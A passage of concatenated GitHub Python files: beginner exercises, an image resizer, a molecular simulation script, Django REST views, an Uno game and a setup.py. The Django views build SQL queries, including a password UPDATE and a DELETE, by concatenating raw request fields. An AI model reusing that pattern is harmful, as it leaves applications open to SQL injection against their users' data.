problem-----------------------------------------------\nword = \"ribbit\"\n\nwhile word != \"frog\":\n print(\"Ribbit\")\n word = input(\"type anything you want but type frog to quit: \")\n\nprint(\"You typed frog\")\n\n#while loop problem-----------------------------------------------\nnum = 100\nwhile num >= 50:\n print(num, end = \" \")\n num-=5\n\n#function problem-----------------------------------------------\ndef AvgTwoNums(x, y):\n \n add = (x + y) / 2\n\n return add\n\nprint(\"The average number is\", AvgTwoNums(8,4))\n\n\n\n\nmarbles = [4, 6, 2, 9]\n\nprint(\"The second element is\", marbles[1])\nfor i in range(len(marbles)):\n marbles[i] *= 5\n print(marbles)\n\n#class problem-----------------------------------------------\nclass fruit():\n def __init__(self, type, weight):\n self.type = type\n self.weight = weight\n self.isFresh 
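convertToWords in the record above peels two-digit groups off n with integer division and modulo; note that the million line assigns `result =` rather than `result +=`, so any billions prefix is silently discarded, and sigificantPlaceValue is presumably meant to read significantPlaceValue. The underlying arithmetic, isolated with divmod:

# The place-value decomposition behind convertToWords. divmod peels off
# groups from most to least significant; each group is what the original
# passes to convertToDigit together with its suffix.
def decompose(n):
    groups = {}
    groups["billion"], rest = divmod(n, 1_000_000_000)
    groups["million"], rest = divmod(rest, 1_000_000)
    groups["thousand"], rest = divmod(rest, 1_000)
    groups["hundred"], groups["ones"] = divmod(rest, 100)
    return groups

print(decompose(1_234_567_890))
# {'billion': 1, 'million': 234, 'thousand': 567, 'hundred': 8, 'ones': 90}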
= True\n\n def printInfo(self):\n print(\"The fruit type is \", self.type, \", the weight is\", self.weight, \"and their freshness status is\", self.isFresh)\n\n def turnRotten(self):\n self.isFresh = False\n\n\n\nfruit1 = fruit(\"Watermelon\",10.0)\nfruit2 = fruit(\"Strawberry\",1.0)\n\nwhile True:\n choice = int(input(\"press 1 to turn the Watermelon rotten, and 2 to turn the Strawberry rotten or 3 to check their info: \"))\n\n if choice == 1:\n fruit1.turnRotten()\n print(\"The watermelon is rotten\")\n elif choice == 2:\n fruit2.turnRotten()\n print(\"The strawberry is rotten\")\n elif choice == 3:\n fruit1.printInfo()\n fruit2.printInfo()\n\n\n\n","repo_name":"ArthurTheAardvar/Python-Review","sub_path":"Python Review/Python_Review.py","file_name":"Python_Review.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73609178613","text":"from tkinter import filedialog\nimport tkinter\nimport sys\nfrom PIL import Image\nimport math\nimport resize as re\n\nfrom os import listdir\nfrom os.path import isfile, join\n\n# if(len(sys.argv) == 1):\nprint('''설명서 : \n1배수 이미지크기를 확인하고 2배수 이미지의 크기를 조정해 드립니다.\n인자로 png 이미지가 있는 경로를 추가해주세요.\n# 배경이 투명인 경우만 가능합니다.\n''')\n# \tsys.exit()\n\n\nroot = tkinter.Tk()\nroot.withdraw()\nmypath = filedialog.askdirectory(parent=root, initialdir=\"./\", title='Please select a directory')\nprint(\"\\ndir_path : \", mypath)\n\n# mypath = sys.argv[1]\n# print('입력받은 경로 : ' + mypath)\nonlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n\nfor item in onlyfiles:\n if (item.find('@2x') > 0):\n loadfilename = item.replace('@2x', '')\n old_image_path = mypath+'\\\\'+loadfilename\n im = Image.open(old_image_path)\n old_width, old_height = im.size\n # print(loadfilename)\n old_width = old_width * 2\n old_height = old_height * 2\n citem = mypath+'\\\\'+item\n print(loadfilename , ' width:',old_width,' height:',old_height)\n re.resize_canvas(citem, citem, old_width, old_height)\n # filename, new_image_path=\"save.png\", canvas_width=500, canvas_height=500\n","repo_name":"kangTaehee/python","sub_path":"filelist-folderselect.py","file_name":"filelist-folderselect.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20898672355","text":"from __future__ import print_function\nimport os\nimport tempfile\nimport copy\n\nimport numpy as np\n\nfrom pdbparser import pdbparser\nfrom pdbparser.log import Logger\nfrom pdbparser.Utilities.Database import __ATOM__\nfrom pdbparser.Utilities.Collection import get_path\nfrom pdbparser.Utilities.Simulate import Simulation\n\nat1 = copy.deepcopy(__ATOM__)\nat2 = copy.deepcopy(__ATOM__)\nat1['atom_name'] = \"h1\"\nat2['atom_name'] = \"h2\"\nat1['residue_name'] = \"h2\"\nat2['residue_name'] = \"h2\"\nat1['element_symbol'] = \"h\"\nat2['element_symbol'] = \"h\"\nat1['coordinates_x'] = -0.125\nat2['coordinates_x'] = 0.125\n\n# import molecule\npdb1 = pdbparser()\npdb1.records = [at1, at2]\n\n# create simulation\nsim = Simulation(pdb1, logStatus = False, logExport = False,\n stepTime = 0.2, numberOfSteps = 10, outputFrequency = 1,\n exportInitialConfiguration = True, outputPath = tempfile.mktemp(\".xyz\"))\n# remove all bonded interactions\nsim.bonds_indexes = []\nsim.angles_indexes = []\nsim.dihedrals_indexes = []\nsim.nBondsThreshold = [[],[]]\n# setting charges to 0\nsim.atomsCharge = [0,0]\n\n# initial 
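The @2x script above reads the 1x image size, doubles it, and delegates to a local resize module that is not shown in this file. A plausible minimal implementation — an assumption, since the repo's actual resize.resize_canvas may differ — pastes the image centred on a larger transparent canvas without scaling, which matches the script's "transparent background only" caveat:

# Hypothetical stand-in for the repo's resize.resize_canvas helper: grow a
# transparent PNG's canvas to (canvas_width, canvas_height) without scaling
# the pixels, keeping the image centred.
from PIL import Image

def resize_canvas(src_path, dst_path, canvas_width, canvas_height):
    img = Image.open(src_path).convert("RGBA")
    canvas = Image.new("RGBA", (canvas_width, canvas_height), (0, 0, 0, 0))
    offset = ((canvas_width - img.width) // 2,
              (canvas_height - img.height) // 2)
    # Using the image itself as the paste mask preserves its alpha channel.
    canvas.paste(img, offset, img)
    canvas.save(dst_path)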
parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [0.15,0.15]\nsim.stepTime = 0.02\nsim.exportInitialConfiguration = False\n\n# re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [-0.15,0.15]\n#\n# # re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [-0.15,-0.15]\n\n# re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [0.15,-0.15]\n\n# re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# minimze molecule\nsim.visualize_trajectory(sim.outputPath)\n","repo_name":"bachiraoun/pdbparser","sub_path":"Examples/simulationNonBonded.py","file_name":"simulationNonBonded.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35485673393","text":"import matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfig=plt.figure()\nax = fig.add_subplot(111, autoscale_on=False, xlim=(0, 2*np.pi), ylim=(-2, 2))\nline, = ax.plot([],[])\ntime_template = 'time = %.1fs'\ntime_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\ndef init():\n line.set_data([], [])\n time_text.set_text('')\n return line, time_text\n\ndef animate(t):\n #currentx=X\n #currenty=Y[t,:]\n\n\n line.set_data(X,Y[t,:])\n time_text.set_text(time_template % t)\n return line,time_text\n\n\n\nani=animation.FuncAnimation(fig,animate,frames=100,interval=20,init_func=init,blit=True)\nplt.show()\n","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Masters/ComponentSpaceAnalysis/AnimateTimeEvol.py","file_name":"AnimateTimeEvol.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4677334823","text":"from django.shortcuts import render\nfrom .models import Imagini, LocatiiAutocar, PretAutocar\nfrom .serializers import ImageSerializer, PretAutocarSerializer, ConditiiSerializer, MasaSerializer, UpdateSerializer, DeleteOrderSerializer, RatingBorderSerializer\nfrom rest_framework import viewsets\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom django.db import connection\nfrom travel_app.utils.jwt_token import decode_token\n\n\nclass ImageListView(generics.ListAPIView):\n serializer_class = 
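The two-atom script above repeatedly calls Simulation.minimize_steepest_descent, and its log lines note that the VDW forces push the pair toward the Lennard-Jones equilibrium separation. The core idea fits in a few lines of numpy — a generic sketch with illustrative eps/sigma/step values, not the pdbparser implementation:

# Steepest descent on a 1D Lennard-Jones pair: the separation converges to
# the potential minimum r_min = 2**(1/6) * sigma.
eps, sigma = 1.0, 1.0

def lj_force(r):
    # F = -dV/dr for V(r) = 4*eps*((sigma/r)**12 - (sigma/r)**6)
    return 24 * eps * (2 * (sigma / r) ** 12 - (sigma / r) ** 6) / r

r, step = 1.5, 1e-3
for _ in range(20000):
    r += step * lj_force(r)      # move along the force (downhill in energy)
print(r, 2 ** (1 / 6) * sigma)   # both ~1.1225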
ImageSerializer\n\n def get_queryset(self):\n queryset = Imagini.objects.raw('SELECT * FROM imagini')\n return queryset\n\n\nclass RatingBorderView(generics.GenericAPIView):\n serializer_class = RatingBorderSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute(\n 'select oras avg(nota) from image_rating where avg(nota) in (select top 1 avg(nota) from image_rating group by oras)')\n return Response({\n 'success'\n })\n\n\nclass ConditiiView(generics.GenericAPIView):\n serializer_class = ConditiiSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute('select count(*) from ' + request.data['tip_transport'] + ' where id_' +\n request.data['tip_transport'] + ' = (select distinct id_' + request.data['tip_transport'] + ' from locatii_' + request.data['tip_transport'] + ' where oras=' + request.data['oras'] + ')')\n isValid = cursor.fetchone()\n\n return Response({\n 'isValid': isValid\n })\n\n\nclass DeleteView(generics.GenericAPIView):\n serializer_class = DeleteOrderSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n obj = decode_token(request.data['token'])\n cursor.execute(\n 'delete from rezervare_tot where nume=(select nume_utilizator from utilizator u where u.username=\\'' + obj['username'] + '\\')')\n\n return Response({\n 'obj': obj\n })\n\n\nclass UpdateView(generics.GenericAPIView):\n serializer_class = UpdateSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n obj = decode_token(request.data['token'])\n cursor.execute(\n 'update utilizator set password=' +\n request.data['password'] +\n ' where username=\\'' + obj['username'] + \"'\"\n )\n\n return Response({\n 'obj': obj\n })\n\n\nclass MasaView(generics.GenericAPIView):\n serializer_class = MasaSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute(\n 'select id_' + request.data['tip_transport'] + ' from locatii_' + request.data['tip_transport'] +\n ' inner join orase on locatii_' + request.data['tip_transport'] + '.oras = orase.id_oras where nume_oras=' +\n request.data['oras']\n )\n transport = cursor.fetchone()\n\n cursor.execute(\n 'select id_masa from masa where nume_masa=' + request.data['masa']\n )\n masa = cursor.fetchone()\n\n return Response({\n 'id_transport': transport,\n 'masa': masa\n })\n\n\nclass PretAutocarView(generics.GenericAPIView):\n serializer_class = PretAutocarSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute(\n 'select pret_autocar from locatii_autocar inner join orase on locatii_autocar.oras = orase.id_oras where nume_oras=' + request.data['oras'])\n pret_autocar = cursor.fetchone()\n cursor.execute(\n 'select pret_zbor from locatii_zbor inner join orase on locatii_zbor.oras = orase.id_oras where nume_oras=' + request.data['oras'])\n pret_zbor = cursor.fetchone()\n cursor.execute(\n 'select pret_masa from masa where nume_masa=' +\n request.data['masa']\n )\n pret_masa = cursor.fetchone()\n cursor.execute(\n 'select procent_discount from discount inner join utilizator on discount.nume_discount=utilizator.status where status=' +\n request.data['statut']\n )\n discount = cursor.fetchone()\n cursor.execute(\n 'select id_' + request.data['tip_transport'] + ' from locatii_' + request.data['tip_transport'] +\n ' inner join orase on locatii_' + request.data['tip_transport'] + '.oras = orase.id_oras where nume_oras=' +\n request.data['oras']\n )\n transport = cursor.fetchone()\n\n return Response(\n {\n 'pret_autocar': pret_autocar,\n 
'pret_zbor': pret_zbor,\n 'pret_masa': pret_masa,\n 'discount': discount,\n 'id_transport': transport\n }\n )\n","repo_name":"stoiica/react","sub_path":"utils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70809098294","text":"\"\"\"\nA Uno game implementation\n\"\"\"\nimport random\n\n\nclass Card:\n \"\"\"\n This creates a set of 112 cards in total: cards ranged from 0 to 9 for Blue, Green,\n Red and Yellow each (20 cards per color)\n 8 Draw Two cards, 8 Reverse cards and 8 Skip cards with two cards per color each\n 4 Wild cards and 4 Wild Draw Four cards.\n\n Attributes:\n rank: an integer representing the number on the card\n \"\"\"\n\n def __init__(self, clr, rank):\n \"\"\"\n Args:\n suit: A string representing the suit.\n rank: An int representing the rank of the card (10-14 is Draw Two, Reverse, Skip\n and Wild Draw).\n \"\"\"\n self.clr = clr\n self.rank = rank\n\n def __repr__(self):\n \"\"\"\n Define the rank of special cards (including Draw Two, Reverse, Skip, Wild and\\\n Wild Draw Four cards) in the card list\n\n Return:\n a list? that represents the information of a card's color and number\n \"\"\"\n # Draw Two = 10, Reverse=11, Skip=12, Wild Card = 13, Wild Draw Four = 14\n if self.rank == 10:\n rank = \"Draw Two\"\n elif self.rank == 11:\n rank = \"Reverse\"\n elif self.rank == 12:\n rank = \"Skip\"\n elif self.rank == 13:\n rank = \"Card\"\n elif self.rank == 14:\n rank = \"Draw Four\"\n else:\n rank = self.rank\n\n return f\"{self.clr} {rank}\"\n\n\nclass Deck:\n \"\"\"\n This defines and records the cards in the deck that players are going to draw from.\n When cards in the deck are run out, the discarded cards are reshuffled and made into a new deck.\n\n Attributes:\n number_of_cards: an integer representing the total number of cards left in the deck\n drawn_cards: a list containing the cards drawn to players from the deck\n pos: a number which represents the position of the card in the deck\n possible_card: a method defined in the previous class which represents the cards that might \\\n appear in the deck\n invalid_colors: a list containing the colors that are not valid and should be discarded if \\\n appearing to be the first of the deck\n invalid_numbers: a list containing the numbers that are not valid and should be discarded if \\\n appearing to be the first of the deck\n new_middle: a list representing the cards in the reshuffled deck\n middle_card: a list containing cards in the deck\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Store initial values to arguments\n \"\"\"\n self.cards = []\n self.middle = []\n for clr in [\"Red\", \"Blue\", \"Green\", \"Yellow\"]:\n for rank in range(0, 13):\n self.cards.append(Card(clr, rank))\n if rank != 0:\n self.cards.append(Card(clr, rank))\n for _ in range(0, 4):\n self.cards.append(Card(\"Wild\", 13))\n self.cards.append(Card(\"Wild\", 13))\n self.cards.append(Card(\"Wild\", 14))\n\n def shuffle(self):\n \"\"\"\n Shuffle all the cards in cards for a random order.\n \"\"\"\n random.shuffle(self.cards)\n\n def draw(self, number_of_cards):\n \"\"\"\n Allow players to draw cards from the deck to their hands\n\n Args:\n number_of_cards: a int representing the number of cards to draw from the deck\n Returns:\n a list of the drawn cards pulled from the deck\n \"\"\"\n if number_of_cards > len(self.cards):\n self.reshuffle()\n drawn_cards = self.cards[0:number_of_cards]\n self.cards = 
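Every raw query in the viewsets above is assembled by concatenating request.data values into the SQL string, which is both fragile (several literals lack quoting) and an SQL-injection vector. Django's cursor accepts %s placeholders and binds values safely on every backend; the same idea shown runnably against sqlite3 (which spells the placeholder ?), with an illustrative table:

# Parameterised queries: the driver substitutes values safely instead of
# pasting them into the SQL text. sqlite3 is used only so the sketch runs
# standalone; with django.db.connection.cursor() the placeholder is "%s".
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE locatii_autocar (oras TEXT, pret REAL)")
conn.execute("INSERT INTO locatii_autocar VALUES ('Paris', 120.0)")

oras = "Paris'; DROP TABLE locatii_autocar; --"   # hostile input stays inert
row = conn.execute(
    "SELECT pret FROM locatii_autocar WHERE oras = ?", [oras]).fetchone()
print(row)  # None: no match, and no injection

row = conn.execute(
    "SELECT pret FROM locatii_autocar WHERE oras = ?", ["Paris"]).fetchone()
print(row)  # (120.0,)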
self.cards[number_of_cards:]\n return drawn_cards\n\n def game_start(self):\n \"\"\"\n The middle card is set, the middle card is checked to not be a action card.\n \"\"\"\n pos = 0\n possible_card = self.cards[0]\n invalid_colors = [\"Wild\"]\n invalid_nums = [\"Draw Four\", \"Card\", \"Reverse\", \"Skip\", \"Draw Two\"]\n if str(possible_card).split()[0] not in invalid_colors and\\\n str(possible_card).split()[1] not in invalid_nums:\n self.middle = self.draw(1)\n print(f\"This is the card in the middle {self.middle[0]}\")\n return\n while str(possible_card).split()[0] in invalid_colors or\\\n str(possible_card).split()[1] in invalid_nums:\n pos += 1\n possible_card = self.cards[pos]\n self.middle = [possible_card]\n self.cards = self.cards[0:pos]+self.cards[pos+1::]\n\n print(f\"This is the card in the middle {self.middle[0]}\")\n\n def reshuffle(self):\n \"\"\"\n Shuffle the discarded cards to make a new deck\n \"\"\"\n new_middle = [self.middle[0]]\n self.cards = self.middle[1::] + self.cards\n self.shuffle()\n self.middle = new_middle\n\n def check_match(self, card):\n \"\"\"\n Check that the discarded card from the player's hand matches the top card on the deck\n\n Args:\n card: a card to checked against the middle card to make sure it is a match\n Returns:\n a boolean true if it a match, false if not a match\n \"\"\"\n middle_card = self.middle[0]\n if middle_card.clr == card.clr or card.clr == \"Wild\":\n return True\n if middle_card.rank == card.rank:\n return True\n return False\n\n def check_action(self, card):\n \"\"\"\n Check that the card is an action card\n\n Args:\n card: a card to check if it is a action card\n Returns\n a boolean, true if the card is an action, false otherwise\n \"\"\"\n if card.rank in range(10, 15):\n return True\n return False\n\n\nclass Player:\n \"\"\"\n This defines and records the cards in players' hands.\n\n Attributes:\n _deck: a list representing cards from the deck\n _hand: a list representing cards in a player's hand\n\n \"\"\"\n\n def __init__(self, deck, name):\n \"\"\"\n Store initial values to arguments\n\n Args:\n Deck: a deck object that the player is connected to\n name: a string representing the player's name\n \"\"\"\n self._deck = deck\n self._hand = self._deck.draw(7)\n self._name = name\n\n @property\n def deck(self):\n \"\"\"\n Access the private variable _deck\n\n Returns:\n the list contained in _deck\n \"\"\"\n return self._deck\n\n @property\n def hand(self):\n \"\"\"\n Access the private variable _hand\n\n Returns:\n the list contained in _hand\n \"\"\"\n return self._hand\n\n @property\n def name(self):\n \"\"\"\n Access the private variable _name\n\n Returns:\n the string contained in _name\n \"\"\"\n return self._name\n\n def display_name(self):\n \"\"\"\n Display player's name.\n\n Return:\n a string representing the player's name\n \"\"\"\n return self.name\n\n def play_card(self, card):\n \"\"\"\n Allow the player to discard a card from their hands doing multiple checks\n if the card is a match to the middle and it is actually in your hand\n\n Args:\n card: a card representing the card the player wants to play\n Returns:\n a boolean representing if the move was successful or not\n \"\"\"\n try:\n if len(self.hand) == 0:\n raise IndexError\n if card not in self.hand:\n raise ValueError\n if not self.deck.check_match(card):\n raise ValueError\n pos = self.hand.index(card)\n if pos < len(self.hand) - 1:\n self._hand = self.hand[0:pos] + self.hand[pos+1::]\n else:\n self._hand = self.hand[0:pos]\n\n self.deck.middle = 
[card] + self.deck.middle\n return True\n except (ValueError, IndexError):\n print(f\"This is not valid move, your hand is {self.hand}\")\n print(f\"The Card in the middle is: {self.deck.middle[0]}\")\n return False\n\n def draw(self, number_of_cards):\n \"\"\"\n Allows the player to draw card/cards from the deck\n\n Args:\n number_of_cards: a int representing the number of cards to draw from the deck\n \"\"\"\n self._hand += self._deck.draw(number_of_cards)\n\n def check_empty(self):\n \"\"\"\n Check if the player has no card left in the hand\n\n Returns:\n a boolean, true if the hand is empty false otherwise\n \"\"\"\n if len(self._hand) == 0:\n return True\n return False\n\n def __repr__(self):\n \"\"\"\n A string representation of player\n\n Returns:\n a string to represent the player\n \"\"\"\n string = \"\"\n for count in range(0, len(self._hand)):\n string = string + f\"Card {count+1}: {self._hand[count]}\\n\"\n return string\n\n\nclass PlayGame:\n \"\"\"\n iterate through the game\n\n Attributes:\n player_list: a list representing all the players in the game in sequence\n player_1: a list containing the deck of cards on the first player's hand\n player_2: a list containing the deck of cards on the second player's hand\n player_3: a list containing the deck of cards on the third player's hand\n player_4: a list containing the deck of cards on the fourth player's hand\n direction: an int representing which direction the list is being cycled through\n current_player: a integer referring to the order of the current player\n next_turn: an integer which decides the next player after current player's turn\n color_chosen: an input argument which allows the player to enter the next color they want to \\\n play after discarding a wild card\n valid_colors: a list containing the colors that are valid might appear in the set of cards\n card_pos: an input argument which allows the player to enter the position of the card they \\\n want to play/discard from the hand\n \"\"\"\n\n player_list = []\n\n def __init__(self, deck, player_names):\n \"\"\"\n Store initial values of arguments\n\n Deck: a deck object that the game is connected to\n name: a list representing the players' names\n \"\"\"\n self.deck = deck\n self.deck.shuffle()\n player_1 = Player(deck, str(player_names[0]))\n player_2 = Player(deck, str(player_names[1]))\n player_3 = Player(deck, str(player_names[2]))\n player_4 = Player(deck, str(player_names[3]))\n self.player_list = [player_1,\n player_2,\n player_3,\n player_4]\n self.direction = 1\n self.current_player = 0\n\n def next_player(self):\n \"\"\"\n Allow the next player in the turn to play game\n\n Returns:\n a int representing the next player position in the player list\n \"\"\"\n next_turn = self.current_player+1*self.direction\n if next_turn == -1:\n next_turn = 3\n elif next_turn == 4:\n next_turn = 0\n return next_turn\n\n def draw_card_played(self, number_of_cards):\n \"\"\"\n Updates the game state after a draw card is played, gives cards to next player\n and skips next player\n\n Args:\n number_of_cards: a int representing the number of cards to draw\n \"\"\"\n self.player_list[self.next_player()].draw(number_of_cards)\n self.skip_card_played()\n\n def reverse_card_played(self):\n \"\"\"\n Reverse the direction of the game when a reverse card is played\n \"\"\"\n self.direction = self.direction*-1\n\n def wild_card_played(self):\n \"\"\"\n Updates the middle card when a wild card is played which asks for user input\n to choose the color of the middle card\n \"\"\"\n 
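next_player above advances by ±1 and patches the wrap-around with two special cases (−1 becomes 3, 4 becomes 0). Python's modulo already yields a non-negative result for a positive modulus, so the same rotation — including direction reversal — collapses to one expression; a sketch:

# Wrap-around turn order via modulo: (-1) % 4 == 3 in Python, so both
# directions wrap correctly without special cases, for any table size.
def next_player(current, direction, n_players=4):
    return (current + direction) % n_players

assert next_player(3, +1) == 0   # forward wrap
assert next_player(0, -1) == 3   # reverse wrap after a Reverse card
assert next_player(1, +1) == 2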
color_chosen = input(\n \"Choose one of the colors, type as seen: Red/Green/Blue/Yellow: \")\n valid_colors = [\"Red\", \"Green\", \"Blue\", \"Yellow\"]\n if color_chosen in valid_colors:\n self.deck.middle[0].clr = color_chosen\n else:\n print(\"That is not a valid input please follow the correct format: \\\"Red\\\"\")\n\n def check_for_matches(self, player):\n \"\"\"\n Check if the card in the player's hand matches the card in the middle of the deck\n if the player does not have any matching cards it adds cards to hand until a match is found\n\n Args:\n player: a player representing the player to check their hand for matches\n Returns:\n return true once a match is found otherwise it recursively looks for a match\n \"\"\"\n for card in player.hand:\n if self.deck.check_match(card):\n return True\n player.draw(1)\n print(\"You had no matches so you take from the deck, here is your new hand\")\n print(player.hand)\n return self.check_for_matches(player)\n\n def skip_card_played(self):\n \"\"\"\n Updates the game state to skip the next player once a skip card is played\n \"\"\"\n self.current_player = self.next_player()\n\n def check_win(self):\n \"\"\"\n Check if any player has run out off all the cards in the hand\n\n Returns:\n a boolean returning true if a player has zero cards otherwise returns false\n \"\"\"\n for player in self.player_list:\n if len(player.hand) == 0:\n return True\n return False\n\n def player_turn(self, player, card_pos):\n \"\"\"\n Updates the game state for a player turn and make sure valid input is given\n\n Args:\n player: a player representing the player whose turn it is currently\n card_pos: a int representing the position of the card in the player hand that the\n player wishes to the player\n \"\"\"\n try:\n card_pos = int(card_pos) - 1\n if card_pos > len(player.hand)-1:\n raise IndexError\n if not player.play_card(player.hand[card_pos]):\n raise ValueError\n if self.deck.check_action(self.deck.middle[0]):\n action = self.deck.middle[0].rank\n if action == 10:\n self.draw_card_played(2)\n elif action == 11:\n self.reverse_card_played()\n elif action == 12:\n self.skip_card_played()\n elif action == 13:\n self.wild_card_played()\n elif action == 14:\n self.wild_card_played()\n self.draw_card_played(4)\n except (IndexError, ValueError):\n print(\"ERROR\")\n self.current_player = self.current_player - 1*self.direction\n\n def play(self):\n \"\"\"\n Runs and update the game state of uno for one complete turn\n \"\"\"\n uno_declare = \"\"\n print(f\"It is {self.player_list[self.current_player].name}'s Turn\")\n self.check_for_matches(self.player_list[self.current_player])\n print(f\"This is your hand:\\n{self.player_list[self.current_player]}\")\n card_pos = input(\n f\"{self.player_list[self.current_player].name} which card do you want to \" +\n \"play type 1 or 2 or ...: \")\n self.player_turn(self.player_list[self.current_player], card_pos)\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n uno_declare = input(\"Hit enter once you are finished with your turn \")\n if len(self.player_list[self.current_player].hand) == 1 and uno_declare != \"Uno!\":\n self.player_list[self.current_player].draw(2)\n print(\"You forgot to say Uno :( you have to draw two cards\")\n elif len(self.player_list[self.current_player].hand) == 1 and uno_declare == \"Uno\":\n print(\"Uno!\")\n self.current_player = self.next_player()\n input(\n 
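wild_card_played above reads a single input and, on a typo, merely prints a warning while leaving the middle card's colour unchanged. A common fix is to re-prompt until a valid colour arrives; a standalone stand-in for that method, not the class code itself:

# Re-prompt until the user supplies a valid colour, instead of silently
# keeping the old colour on bad input.
VALID_COLORS = ("Red", "Green", "Blue", "Yellow")

def choose_color():
    while True:
        color = input("Choose one of: Red/Green/Blue/Yellow: ").strip()
        if color in VALID_COLORS:
            return color
        print('Not a valid input; please follow the format "Red".')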
f\"Hit Enter once {self.player_list[self.current_player].name} is at the computer\")\n print(\n f\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis is the card in the middle: {self.deck.middle[0]}\")\n\n def win_message(self, player):\n \"\"\"\n Print out the winning message according to the player\n\n Args:\n player: a player representing the player which has won\n \"\"\"\n print(f\"Congrats {player.name}! You have won! Please continue\" +\n \"to rub it in your opponents face now\")\n","repo_name":"olincollege/uno-card-game","sub_path":"uno_deck.py","file_name":"uno_deck.py","file_ext":"py","file_size_in_byte":16640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10954815667","text":"# Definition for singly-linked list.\nfrom typing import Optional\n\n\nclass ListNode:\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution:\n\tdef detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n\t\t\n\t\tvisitedNodes = dict()\n\t\t\n\t\twhile head:\n\t\t\tif id(head) in visitedNodes:\n\t\t\t\treturn head\n\t\t\t\n\t\t\tvisitedNodes[id(head)] = head \n\t\t\thead = head.next\n\t\t\t\n\t\treturn None\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t","repo_name":"A7fa7fa/python-leetcode","sub_path":"0142 - linked-list-cycle-ii/linked-list-cycle-ii.py","file_name":"linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74346809334","text":"from setuptools import setup, Extension\n\ndebug = False\n\nsources = {\n \"system\": \"ssystem simoptions energyoptions statespace utility sequtil simtimer\",\n \"state\": \"scomplex scomplexlist strandordering\",\n \"loop\": \"move moveutil loop\",\n \"energymodel\": \"nupackenergymodel energymodel\",\n \"interface\": \"multistrand_module options optionlists\"\n}\n\nsetup(ext_modules=[Extension(\n name=\"multistrand.system\",\n include_dirs=[\"./src/include\"],\n language=\"c++\",\n define_macros=[(\"DEBUG_MACROS\", None)] if debug else [(\"NDEBUG\", None)],\n undef_macros=[\"NDEBUG\"] if debug else [],\n extra_compile_args=[\"-std=c++11\", \"-w\", \"-Wall\"] + (\n [\"-g\", \"-O0\", \"-fno-inline\"] if debug else [\"-O3\"]),\n sources=[f\"src/{d}/{f}.cc\" for d, fs in sources.items()\n for f in fs.split(\" \")])])\n","repo_name":"DNA-and-Natural-Algorithms-Group/multistrand","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"15603041517","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, permissions\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom api.models import (\n Admin,\n Person,\n Driver,\n 